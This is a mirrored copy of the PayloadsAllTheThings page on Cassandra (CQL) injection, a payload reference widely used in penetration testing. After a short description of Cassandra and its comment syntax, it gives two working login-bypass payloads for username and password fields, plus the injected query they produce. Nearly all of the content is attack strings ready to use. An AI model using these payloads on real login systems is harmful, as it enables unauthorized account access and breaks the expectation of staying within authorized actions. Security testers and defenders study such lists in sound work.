wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-23 21:36:09 +02:00
Code Issues Releases Activity
PayloadsAllTheThings/SQL Injection/Cassandra Injection.md
Siddharth Reddy fdc44ce84e
Update Cassandra Injection.md 
Broken link [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
2020-10-09 18:10:12 +05:30

763 B
Raw Blame History

Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Summary

Cassandra comment

/* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

username: admin' ALLOW FILTERING; %00
password: ANY

Login Bypass 1

username: admin'/*
password: */and pass>'

The injection would look like the following SQL query

SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

References